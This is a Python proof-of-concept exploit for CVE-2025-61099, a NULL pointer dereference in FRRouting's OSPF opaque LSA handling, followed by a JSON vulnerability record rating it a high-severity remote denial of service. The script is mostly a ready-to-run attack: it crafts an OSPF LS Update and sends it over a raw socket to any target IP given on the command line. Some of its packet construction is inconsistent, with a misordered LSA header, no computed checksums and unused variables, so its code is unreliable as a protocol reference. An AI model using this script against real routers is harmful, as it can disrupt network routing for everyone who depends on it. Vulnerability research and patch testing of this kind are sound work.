CVE-2025-61099

#!/usr/bin/env python3 """ CVE-2025-61099 PoC - FRRouting NULL Pointer Dereference in ospf_opaque.c This PoC demonstrates sending a crafted OSPF Opaque LSA to trigger NULL pointer dereference. """ import socket import struct import random def calculate_ospf_checksum(data): """Calculate OSPF checksum""" # Simplified checksum calculation total = sum(struct.unpack('!' + 'H' * (len(data) // 2), data[:len(data)//2*2])) if len(data) % 2: total += struct.unpack('!B', data[-1:])[0] while total >> 16: total = (total & 0xFFFF) + (total >> 16) return ~total & 0xFFFF def build_crafted_ospf_packet(): """Build a crafted OSPF LS Update packet with malicious Opaque LSA""" # OSPF Header version = 2 # OSPF v2 msg_type = 4 # LS Update length = 0 # Will be calculated router_id = socket.inet_aton('10.0.0.1') area_id = socket.inet_aton('0.0.0.0') checksum = 0 autype = 0 auth = b'\x00' * 8 header = struct.pack('!BBHH4s4sHH', version, msg_type, length, checksum, router_id, area_id, autype, 0) + auth # Number of LSAs num_lsas = 1 # Crafted Opaque LSA (Type 9/10/11) that triggers NULL pointer dereference # LSA Header ls_age = 1 options = 0x22 ls_type = 9 # Opaque LSA Type 9 link_state_id = b'\x00\x00\x00\x01' advertising_router = socket.inet_aton('192.168.1.1') ls_sequence = 0x80000001 ls_checksum = 0 length = 64 # LSA length lsa_header = struct.pack('!HHBB4s4sIiHH', ls_age, ls_checksum, options, ls_type, link_state_id, advertising_router, ls_sequence, 0, length) # Malicious LSA body designed to trigger NULL dereference # This contains crafted data that causes opaque_info_detail to dereference NULL lsa_body = b'\x00' * 44 # Padding to cause NULL pointer access # Opaque TLV with crafted values opaque_type = struct.pack('!H', 1) opaque_length = struct.pack('!H', 36) opaque_value = b'\xFF' * 36 crafted_lsa = lsa_header + opaque_type + opaque_length + opaque_value return header[:4] + struct.pack('!H', len(header) + 4 + len(crafted_lsa)) + header[6:] + struct.pack('!I', num_lsas) + crafted_lsa def send_exploit(target_ip, router_id): """Send the crafted exploit packet""" sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_OSPFIGP) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # Build packet with proper OSPF header packet = build_crafted_ospf_packet() # Send to target sock.sendto(packet, (target_ip, 0)) print(f"[*] Sent crafted OSPF Opaque LSA packet to {target_ip}") print(f"[*] This packet is designed to trigger NULL pointer dereference in opaque_info_detail") sock.close() if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [source_router_id]") sys.exit(1) target = sys.argv[1] router_id = sys.argv[2] if len(sys.argv) > 2 else '10.0.0.1' send_exploit(target, router_id)

{"cve": {"id": "CVE-2025-61099", "sourceIdentifier": "[email protected]", "published": "2025-10-27T19:16:04.880", "lastModified": "2025-11-03T18:05:28.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FRRouting/frr from v2.0 through v10.4.1 was discovered to contain a NULL pointer dereference via the opaque_info_detail function at ospf_opaque.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted LS Update packet."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndIncluding": "10.4.1", "matchCriteriaId": "ED1CF39B-BF18-4F9D-B29B-020CDAED494A"}]}]}], "references": [{"url": "https://github.com/FRRouting/frr/issues/19471", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/FRRouting/frr/pull/19480", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/FRRouting/frr/pull/19480/commits/0042fbe8ca5aba866b4f0d166e54066bba5ab14e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/s1awwhy/BugList/blob/main/CVE-2025-61099.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}